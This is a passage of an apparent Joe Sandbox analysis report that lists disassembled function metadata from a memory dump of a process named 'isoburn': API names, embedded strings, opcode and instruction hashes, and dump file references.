                                                                                                                            • Instruction Fuzzy Hash: 2541F4317047068FC720DE29E842F6EB7EAFF84725F000A1DE95A9B280D771E4058B91
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0507728C
                                                                                                                            Strings
                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05077294
                                                                                                                            • RTL: Resource at %p, xrefs: 050772A3
                                                                                                                            • RTL: Re-Waiting, xrefs: 050772C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                            • Opcode ID: 041f269f2c24da0cd2137bb7daf9134e4418685e5dc3516015e07b386417b117
                                                                                                                            • Instruction ID: d1ee9af7e29898b37f088d4120fa253a05941762efbced3d048e2d53db0a88b6
                                                                                                                            • Opcode Fuzzy Hash: 041f269f2c24da0cd2137bb7daf9134e4418685e5dc3516015e07b386417b117
                                                                                                                            • Instruction Fuzzy Hash: C841E131B04206ABC721DE25EC42F6EB7E6FB94754F100619FD559B240DB21F812CBD4
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                            • Opcode ID: 4e65cc8d957d8ed643e023c45b28d9db45a09c8f0265086890cd19655d794d61
                                                                                                                            • Instruction ID: fe6df4dbf2d73ce7b4875fdc6e4c33828753cf7a9146b84263a1c5b3f19fb810
                                                                                                                            • Opcode Fuzzy Hash: 4e65cc8d957d8ed643e023c45b28d9db45a09c8f0265086890cd19655d794d61
                                                                                                                            • Instruction Fuzzy Hash: 4E315476A002199FDB60DE29DC84BEF77F8FF54610F454555E849E3240EB70AA458FA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-
                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction ID: 85419205abf1f54632ac5fea8d441fce72d96ef3844376f5fd4379edaca168be
                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction Fuzzy Hash: D59193F0E042169BDB64DE69E881ABEB7F6FF44320F54863AE855A72C0D73099438F50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 0-1194432280
                                                                                                                            • Opcode ID: 744dc738c6aae685007f22f0b650b94058b0874d344a7658bf71f5b91c6a1055
                                                                                                                            • Instruction ID: 8bc4ba43ab23c2699eb6de71852a26d150e9b6e573ae3375be1a30d93d05a58c
                                                                                                                            • Opcode Fuzzy Hash: 744dc738c6aae685007f22f0b650b94058b0874d344a7658bf71f5b91c6a1055
                                                                                                                            • Instruction Fuzzy Hash: 97813A75E012699BDB31DB54DC44BEEB7B4AF08750F0445EAE90AB7280D7309E84CFA0